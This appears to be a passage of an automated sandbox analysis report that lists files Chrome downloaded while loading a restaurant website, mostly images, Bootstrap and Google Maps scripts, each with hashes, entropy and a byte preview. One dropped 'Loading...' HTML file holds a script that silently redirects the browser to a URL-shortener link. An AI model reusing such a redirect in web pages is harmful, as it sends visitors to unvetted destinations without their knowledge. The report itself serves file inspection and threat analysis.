                                                                                                                                                    Entropy (8bit):7.947500596841372
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:Z6rz+x5oIqDDojPt2YDUNujl7rj0wvmGHulNBjvNB:OlIqDDojPt2OU09j0wuGiP
                                                                                                                                                    MD5:D72C8F3C3B289AAD39B1191E4D196573
                                                                                                                                                    SHA1:25B987690044881254A25C52EC87EBE3834C1E4B
                                                                                                                                                    SHA-256:47A3A76207E6244D3BC4A1B30F8B2F895DD47F9176C3340826CE56C9CF5EB363
                                                                                                                                                    SHA-512:07057700A9DA7AAC1CD2A2CD50D3A294A2888708D9DA2E10E896584397E9B6DBEAAFA733C6DDE9EEEDAD095AEF1C219A50565F9778044AD3A477F1ABF4A71EB5
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:......Exif..MM.*...............@.......................................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:26 16:53:48.............0221.......................@...........................................r...........z.(.................................[.......H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................F...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?......-.h..U.s.~.l.+...N....]F.;..(.......:..-..=..b.Y._...46Zm.#..7..:..
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 150 x 75, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):46099
                                                                                                                                                    Entropy (8bit):6.4159642624291635
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:xcdDivVcLU5SabT9ItEOgHmQ36rFe/8v9T+QoY:+PabTOtEOgGa6Y/8vRR
                                                                                                                                                    MD5:BB9A21806151B625483DD47A74CFBDEA
                                                                                                                                                    SHA1:5D627946B288B0D1A43E498FF441DEF3A59C6820
                                                                                                                                                    SHA-256:D83ABAE4879503FC22359859C95EAD51842CF09E5AC028713BCABB956C7ACA28
                                                                                                                                                    SHA-512:FB8BAF18B417FD236FDB7F6E02128E877369795A4C994F816DD7F08E93FFA4614D5F501711E76747186A97F6E8DCC37153927469C4C89CE0A8312BEB40E22651
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/menu_imges/Rice_with_Spinach.png
                                                                                                                                                    Preview:.PNG........IHDR.......K.......~.....pHYs................MiCCPPhotoshop ICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m.......
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 70 x 49, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):17444
                                                                                                                                                    Entropy (8bit):2.8585346832948297
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:cSdb8kEWm+L+9xNX7sc5FpISlVnkAiesbOoerPAi1:cSKk6Dn5PzkYoGh1
                                                                                                                                                    MD5:EAED5BD1DABF13491302CB5960F21F93
                                                                                                                                                    SHA1:49123D52EE03E8B92CAFA08619B38726262A21F1
                                                                                                                                                    SHA-256:B3965934B37289BCEAB581771C865CA6385BBD852D2BA3824337E09DF13461A5
                                                                                                                                                    SHA-512:DD3E1BD7E8904EA785D9CF3A342229342FD4260C547938759EFF9E368CC138E68EB2E8ECE39E4898E35DB9D3E874DC3992CBB73E9B6912BC5BCD91672CBC944E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/food_menu_vegfood.png
                                                                                                                                                    Preview:.PNG........IHDR...F...1.....g.......pHYs...............;jiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:exif="http://ns.adobe.com/exif/1.0/">. <xmp:CreatorTool>Adobe Photoshop CC 2015 (Windows)</xmp:CreatorTool>. <xmp:CreateDate>2022-07-17T17:36:24+05:30</xmp:CreateDate>. <
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=1200, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1600], progressive, precision 8, 700x700, components 3
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):167711
                                                                                                                                                    Entropy (8bit):7.957215937268096
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:NyvGyvlV6u9ad6LgUiKI4r6DX0WTaa6Vw/on/fqzFw6gq:NcGcl9ad6LgdDK6WwwfqzFw+
                                                                                                                                                    MD5:9B30FFFB0F089CF197B6D1EFB733C678
                                                                                                                                                    SHA1:FDB575E825D90E4036EBBECD7336022293CD5D99
                                                                                                                                                    SHA-256:09625AC85911FECB47BB2A3E5E61F43ABF72B79C435A855068976946E18CDA3B
                                                                                                                                                    SHA-512:07770C97493740DFDA647DFE42A179DE865D36A9F22773C575FC8AEA775EEEDE657A611EE863718954BF55690DCB0187FDD31976A970A2F2ADAF120E96A2A9F8
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/gallery/gallary-7.jpg
                                                                                                                                                    Preview:....(.Exif..MM.*...............@.......................................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:22 19:33:34.............0221...................................................................r...........z.(................................&........H.......H..........Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....a.P.w.....f..R...jU.f.p......Qo..........0.A.F...t.....VU#".......
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (479), with no line terminators
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):479
                                                                                                                                                    Entropy (8bit):5.84112036234775
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6:qzxUQjwCX96IABmELDM9tlcTr4g70x1uIPusxWeZjYMfUmA05qHT2D3zxy6tPI5S:kxvsCk9cE3MA/XDOJ758cy6pySYI
                                                                                                                                                    MD5:C3A5F3592E30FDE9D3930587001CC560
                                                                                                                                                    SHA1:ECBF9695DBEC76F8A1B7EA4DBB885C7D9FFCF515
                                                                                                                                                    SHA-256:358B9AA9B77A5903C07D41EC99C46336E3A06C1973187476FAF763692E712B02
                                                                                                                                                    SHA-512:4EF071BC8B71A83471832286E7FD095F06B3439F9F4E6BB058CEC9D07F65E23DA2353A87D828703CF9496449AEF220DDA81B2382F82274A77A1E6EECF286FACF
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:<html><head><title>Loading...</title></head><body><script type='text/javascript'>window.location.replace('https://cuturls.net/eWD0j3?ch=1&js=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiJKb2tlbiIsImV4cCI6MTcyNzc2NDA1OCwiaWF0IjoxNzI3NzU2ODU4LCJpc3MiOiJKb2tlbiIsImpzIjoxLCJqdGkiOiIydnQzamRjYWFnZ29lMnVobHNhcGFtODkiLCJuYmYiOjE3Mjc3NTY4NTgsInRzIjoxNzI3NzU2ODU4OTIyNTk3fQ.bCP960tLT_H6O6aTYEn7MT_1n2RTqLrSvctb_I6s_lA&sid=531b57b9-7fad-11ef-9455-174eec4a577f');</script></body></html>
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:ASCII text, with very long lines (1546)
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):3482
                                                                                                                                                    Entropy (8bit):5.280960217431154
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:aPfvCM5D9f/xjdN3EGUkJuJ5VofaNdVzN2JfE:cfaM5D9f/xjfEGUjbofaNdV4ZE
                                                                                                                                                    MD5:E48F188473D454074A2AB3A34870A0CB
                                                                                                                                                    SHA1:620BC90A66495D3CE47B303DE88EE0419455733A
                                                                                                                                                    SHA-256:E0DE807AE54325DFC02FA6EBE3C2F863BC5428B8E8FD98A9FE96119A953FD103
                                                                                                                                                    SHA-512:D41F5430C6AEE123E05095FF41EFA6D68CE4DB7D99CB3EE1343DFF5AFB02D36A960C42CBC190E14119D174E557EAA995E4A324BBD935C95D2B30227E61CE41EE
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:google.maps.__gjsload__('search_impl', function(_){var izb=function(a,b){_.Bg(a.Gg,3,b)},mzb=function(a,b,c){var d=new jzb;d=_.WG(d);c.ur=d.load.bind(d);c.clickable=a.get("clickable")!==!1;_.EZa(c,_.lQ(b));b=[];b.push(_.bk(c,"click",kzb.bind(null,a)));for(const e of["mouseover","mouseout","mousemove"])b.push(_.bk(c,e,lzb.bind(null,a,e)));b.push(_.bk(a,"clickable_changed",()=>{a.Eg.clickable=a.get("clickable")!==!1}));a.Fg=b},kzb=function(a,b,c,d,e){let f=null;if(e&&(f={status:e.getStatus()},e.getStatus()===0)){f.location=_.V(e.Gg,2)?new _.Mj(_.$s(_.J(e.Gg,.2,_.et).Gg,1),_.$s(_.J(e.Gg,2,_.et).Gg,2)):null;const g={};f.fields=g;const h=_.Zh(e.Gg,3);for(let k=0;k<h;++k){const m=_.Zq(e.Gg,3,_.vQ,k);g[m.getKey()]=m.getValue()}}_.nk(a,"click",b,c,d,f)},lzb=function(a,b,c,d,e,f,g){let h=null;f&&(h={title:f[1].title,snippet:f[1].snippet});_.nk(a,b,c,d,e,h,g)},nzb=function(){},ozb=class{},pzb=class extends _.U{constructor(){super()}Pi(){return _.ri(this.Gg,2)}},qzb=[_.M,,,_.so,_.V_a];var rzb=cla
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:ASCII text, with very long lines (554)
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):184994
                                                                                                                                                    Entropy (8bit):5.631569490379207
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:YxTjNm8H2AO+yNwbuQjTgkK6Drm545DtsdayPnR5t1P2/6FzgAEY7N3D0OTFOu/b:YxTPWAO+yNwSQngkKWy545ydaqnR5tlJ
                                                                                                                                                    MD5:09E687964AECC32424F69065C6E09E01
                                                                                                                                                    SHA1:B8D3F468CA1EB45F21FC919564FAD50089B072AE
                                                                                                                                                    SHA-256:A55663C398778C3399E0BCB628DE29B8C4040611F00E8F996A7FEBF0CA0B3F84
                                                                                                                                                    SHA-512:BA389AB20D835938602484CB87B6D57A0D73271FA54DE81E57781524B6847BA06B88E0DE492CAF72E5035D6D8A1105F58D3EF85392B13DE53CC5DE1B1B6ADDD8
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://maps.googleapis.com/maps-api-v3/api/js/58/6/util.js
                                                                                                                                                    Preview:google.maps.__gjsload__('util', function(_){/*.. Copyright 2024 Google, Inc. SPDX-License-Identifier: MIT.*/.var Zya,aza,cza,dza,eza,fza,hza,OC,QC,RC,jza,lza,UC,nza,VC,pza,WC,rza,qza,sza,tza,uza,vza,wza,xza,yza,zza,Aza,Bza,Cza,Dza,Eza,Fza,Gza,Hza,Iza,Jza,Kza,$C,Nza,bD,Oza,Pza,Qza,Rza,Sza,Tza,Uza,Vza,Wza,Xza,Yza,$za,bAa,dAa,fAa,hAa,jAa,lAa,nAa,pAa,rAa,sAa,tAa,uAa,vAa,wAa,xAa,yAa,cD,zAa,AAa,BAa,CAa,DAa,EAa,GAa,eD,fD,HAa,IAa,JAa,KAa,LAa,MAa,NAa,OAa,PAa,QAa,RAa,gD,SAa,hD,TAa,UAa,VAa,WAa,XAa,YAa,ZAa,iD,$Aa,jD,aBa,bBa,cBa,dBa,eBa,fBa,gBa,hBa,iBa,jBa,kBa,lBa,mBa,nBa,oBa,pBa,qBa,rBa,sBa,uBa,vBa,wBa,yBa,lD,zBa,ABa,.BBa,CBa,DBa,EBa,GBa,JBa,KBa,MBa,PBa,QBa,RBa,ED,FD,GD,TBa,ID,JD,KD,LD,ND,VBa,OD,WBa,XBa,YBa,PD,QD,RD,SD,TD,ZBa,$Ba,aCa,cCa,dCa,UD,eCa,bCa,hCa,iCa,$D,mCa,qCa,rCa,sCa,cE,tCa,vCa,wCa,xCa,yCa,fE,ACa,FCa,oE,ICa,HCa,qE,JCa,sE,LCa,MCa,NCa,PCa,QCa,RE,SCa,SE,TCa,UCa,VCa,WCa,UE,YCa,XCa,ZCa,aDa,cDa,eDa,iDa,gDa,jDa,hDa,VE,WE,mDa,nDa,XE,YE,ZE,aF,bF,cF,pDa,eF,fF,qDa,gF,rDa,hF,iF,sDa,jF,kF,tDa,lF,zD
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:ASCII text, with very long lines (1546)
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):3482
                                                                                                                                                    Entropy (8bit):5.280960217431154
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:aPfvCM5D9f/xjdN3EGUkJuJ5VofaNdVzN2JfE:cfaM5D9f/xjfEGUjbofaNdV4ZE
                                                                                                                                                    MD5:E48F188473D454074A2AB3A34870A0CB
                                                                                                                                                    SHA1:620BC90A66495D3CE47B303DE88EE0419455733A
                                                                                                                                                    SHA-256:E0DE807AE54325DFC02FA6EBE3C2F863BC5428B8E8FD98A9FE96119A953FD103
                                                                                                                                                    SHA-512:D41F5430C6AEE123E05095FF41EFA6D68CE4DB7D99CB3EE1343DFF5AFB02D36A960C42CBC190E14119D174E557EAA995E4A324BBD935C95D2B30227E61CE41EE
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://maps.googleapis.com/maps-api-v3/api/js/58/6/search_impl.js
                                                                                                                                                    Preview:google.maps.__gjsload__('search_impl', function(_){var izb=function(a,b){_.Bg(a.Gg,3,b)},mzb=function(a,b,c){var d=new jzb;d=_.WG(d);c.ur=d.load.bind(d);c.clickable=a.get("clickable")!==!1;_.EZa(c,_.lQ(b));b=[];b.push(_.bk(c,"click",kzb.bind(null,a)));for(const e of["mouseover","mouseout","mousemove"])b.push(_.bk(c,e,lzb.bind(null,a,e)));b.push(_.bk(a,"clickable_changed",()=>{a.Eg.clickable=a.get("clickable")!==!1}));a.Fg=b},kzb=function(a,b,c,d,e){let f=null;if(e&&(f={status:e.getStatus()},e.getStatus()===0)){f.location=_.V(e.Gg,2)?new _.Mj(_.$s(_.J(e.Gg,.2,_.et).Gg,1),_.$s(_.J(e.Gg,2,_.et).Gg,2)):null;const g={};f.fields=g;const h=_.Zh(e.Gg,3);for(let k=0;k<h;++k){const m=_.Zq(e.Gg,3,_.vQ,k);g[m.getKey()]=m.getValue()}}_.nk(a,"click",b,c,d,f)},lzb=function(a,b,c,d,e,f,g){let h=null;f&&(h={title:f[1].title,snippet:f[1].snippet});_.nk(a,b,c,d,e,h,g)},nzb=function(){},ozb=class{},pzb=class extends _.U{constructor(){super()}Pi(){return _.ri(this.Gg,2)}},qzb=[_.M,,,_.so,_.V_a];var rzb=cla
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 141 x 75, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):44675
                                                                                                                                                    Entropy (8bit):6.349379332660152
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:QidDiclU57weRozG+c/RlkhfoPHrKpmSlDORd:vIwO4fcKA3
                                                                                                                                                    MD5:448C5EF8D9E7DB7734C0E0B43D0FE077
                                                                                                                                                    SHA1:986F041AC8B134AFDA12DE60CA29E7E2DA599099
                                                                                                                                                    SHA-256:67AA3409DC75432C5F5E76DD1E9AAFE4E6914C53BDD1A249AE5751E90E7E16C4
                                                                                                                                                    SHA-512:9534BE07A1302E62B493964381DF1FE805DBE48F40707803402C6FDD3D893B8FD1662143037649CC3019D3D753C414DFA82B2F301289448F48144B8D77FC956C
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:.PNG........IHDR.......K.....M.......pHYs................MiCCPPhotoshop ICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m.......
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=1068, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1600], progressive, precision 8, 700x700, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):153031
                                                                                                                                                    Entropy (8bit):7.941882521878217
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:p2/e02/e98u6Mxgbk9KnG2YrXm31DU9hiM06Y95vsl7x5:peUTb6KkhiL/El7z
                                                                                                                                                    MD5:62CACB2F198D145F7B123AFAF996BF90
                                                                                                                                                    SHA1:279335060B03CE779A10AB73A9E7EA449B4A969C
                                                                                                                                                    SHA-256:CCF4CACB106C44636979C1BDD7998EAC72724079726DE7B5831F3C7563AA58AD
                                                                                                                                                    SHA-512:D572DCAA3A3510427274EE002BED6D0C7F467CB3DC5973638A172FC19B8C594757151E50DB639B3D2FAAC8FECF5060549C4543B0DFB595757FD467C79AA3A69B
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:..../.Exif..MM.*...............@...........,...........................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:26 22:16:23.............0221...................................................................r...........z.(................................-~.......H.......H..........Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?......;.U.......yMUq^.....*~..".:G?.......f.....H=..R....W..e.?.um....Y....
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:ASCII text, with very long lines (337)
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):222911
                                                                                                                                                    Entropy (8bit):4.9595961999972635
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6144:p5a6J9BUMJ6nHoBGi5fy0YVg4LvhMEq1U:p5CcY5zaEq1U
                                                                                                                                                    MD5:A9247B1FE21EE409D0B37E74100DE687
                                                                                                                                                    SHA1:7038343DE806C871E93D1681AB48633B7AA34F58
                                                                                                                                                    SHA-256:A55ADE67AEDF45A013CA01C5E93FA042D175348EF4D16F64CDE022BEEE9ABBD5
                                                                                                                                                    SHA-512:9A157E19EE19935EAB849366487A7B0830F8483997AA3C784D510CE22A2F91030B3DA04C10BCBD6F8ECDE3724EFDA5EC9917782B489FB466DA364D0D9F45E904
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:/*!. * Bootstrap v4.3.1 (https://getbootstrap.com/). * Copyright 2011-2019 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.(function (global, factory) {. typeof exports === 'object' && typeof module !== 'undefined' ? factory(exports, require('jquery')) :. typeof define === 'function' && define.amd ? define(['exports', 'jquery'], factory) :. (global = global || self, factory(global.bootstrap = {}, global.jQuery));.}(this, function (exports, $) { 'use strict';.. $ = $ && $.hasOwnProperty('default') ? $['default'] : $;.. function _defineProperties(target, props) {. for (var i = 0; i < props.length; i++) {. var descriptor = props[i];. descriptor.enumerable = descriptor.enumerable || false;. descriptor.configurable = true;. if ("value" in descriptor) descriptor.writable = true;. Object.defineProperty(target, descriptor.key, descriptor);. }.
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:ASCII text, with very long lines (3664)
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):296574
                                                                                                                                                    Entropy (8bit):5.4789881757349805
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:6144:587K0nBdQUUiaWlA8c+NgYCsGsRthM7aSaQ/2pQVrrl/BM9NXuC2r:587K0nBdQUUiaN8cFYlM7aSas2pQVrrj
                                                                                                                                                    MD5:263B942BC5E51BD9868FC0E2CAEA89A0
                                                                                                                                                    SHA1:894341592CC3BCD96287651D2A32F4B7C6DE85CA
                                                                                                                                                    SHA-256:1729747AE6545E8764A8BB3D0529ABB8681587FA816A9D7857B84D406BCB5AD2
                                                                                                                                                    SHA-512:0B0F81624489AB0720CCD2B486546BFC350EC8D13929D43127B219F28D8A07728923A17A912E732E24A9FF631E605F2B5138F0EAD86585F0A87CE3508CE8479A
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://maps.googleapis.com/maps-api-v3/api/js/58/6/common.js
                                                                                                                                                    Preview:google.maps.__gjsload__('common', function(_){var ija,mq,kja,lja,oja,nq,pja,rq,tq,wq,qja,rja,sja,tja,uja,Jq,wja,xja,Mq,Oq,Pq,Cja,Dja,Qq,Tq,Eja,Ija,Hja,Mja,Pja,zr,Ir,Jr,Sja,Lr,Tja,Uja,Vja,Wja,Xja,Yja,Zja,$ja,dka,eka,fka,gka,hka,Pr,Qr,ika,Rr,jka,Sr,kka,Tr,Wr,Yr,mka,nka,pka,oka,tka,uka,wka,Fs,yka,Aka,Cka,Qs,Gka,vt,Pka,Rka,Qka,Vka,Wka,Zka,$ka,ala,Zt,eu,fla,fu,iu,gla,ju,hla,mu,pla,Au,tla,Bu,ula,vla,xla,zla,yla,Bla,Ala,wla,Cla,Dla,Gu,Ela,kma,oma,qma,sma,Gma,ena,hna,lna,mna,una,vna,wna,xna,Bna,zna,xx,yx,Dna,Ena,Fna,Gna,Hq,Gq,mja,nja,yja,Aja,Bx,Fja,.Ina,qw,rw,Jna,pma,pw,sw,Jja,Kja,tma,Lja,Ex,Kna,Gx,Hx,Lna,Mna,Ona,Jx,Pna,Qna,Lx,Mx,Rna,Sna,Ox,Tna,Px,Una,Vna,Sx,Wna,Xna,Yna,Wx,Zna,$na,Yx,Zx,$x,ay,aoa,boa,coa,doa,aka,cka,ioa,joa,koa,loa,moa,ey,gw,poa,qoa,roa,rka,bs,toa,Mma,dna,Xma,Dka,Ks;_.jq=function(a){return!!a.handled};_.kq=function(a,b){var c=Array.prototype.slice.call(arguments,1);return function(){var d=c.slice();d.push.apply(d,arguments);return a.apply(this,d)}};._.hja=function(a,b){functio
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=744, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1600], progressive, precision 8, 2000x843, components 3
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):206109
                                                                                                                                                    Entropy (8bit):7.964960625472791
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:dfyU51q/28uULO/tF3kcyzq/DXhJ8o71JqonsFS+9Z1He+nLUIJ0A9Lii6:df18/28dO/tFNv9z+9790AAi6
                                                                                                                                                    MD5:3020BF4FD79C6448B385444595DBAE20
                                                                                                                                                    SHA1:4397F8D9C0FFCF2031F79806277DBA37F0A91D14
                                                                                                                                                    SHA-256:954C3529C2FF48558CC7F071F286F837D18AC0C167F18A143E33173A88CDCDF9
                                                                                                                                                    SHA-512:93AFA7FA684BB9BA36C1482A98C0D2CE479C541BD8D8055270972359173D50F7F1ABD4D0BF6652EB91D6381E3A3D0D97D1A4A0FC21DA23FA553C2E20839C23C8
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/header_2.jpg
                                                                                                                                                    Preview:.....5Exif..MM.*...............@.......................................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:26 17:37:12.............0221..................................K...............................r...........z.(.........................................H.......H..........Adobe_CM......Adobe.d.................................................................................................................................................C...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?......W.k.....sQmn......8.{...*.]o.Z.......k\.K..6.i..YA.{6I./..."A.....T
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=1066, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1600], progressive, precision 8, 700x700, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):157537
                                                                                                                                                    Entropy (8bit):7.950558349142844
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:wc24tiRc24tizRD2nouR8FwnDAF4zg9Vy2ZGzWjxvpvhEZ6iH:wc2lRc2lVDv1wnDxzg9dw2xBu6iH
                                                                                                                                                    MD5:8CA02AC466605A701F8B2CBCE18BD2A8
                                                                                                                                                    SHA1:2D9FD819EE807EA58173ACC12A56AA92A3D0AB5F
                                                                                                                                                    SHA-256:58F030223A34D16B7712B17DB7D0958832353B65DFB9418827B0BD8AF6C22D60
                                                                                                                                                    SHA-512:C141D8EBAAE7B02A1277957859FBB8C2CBF80E0623614BDB70F93D6C697A7A52253C42E99650CCA96A0555F208BD1E9DE7BFF979F8C7E75E5BF0BFAE09C56CDC
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
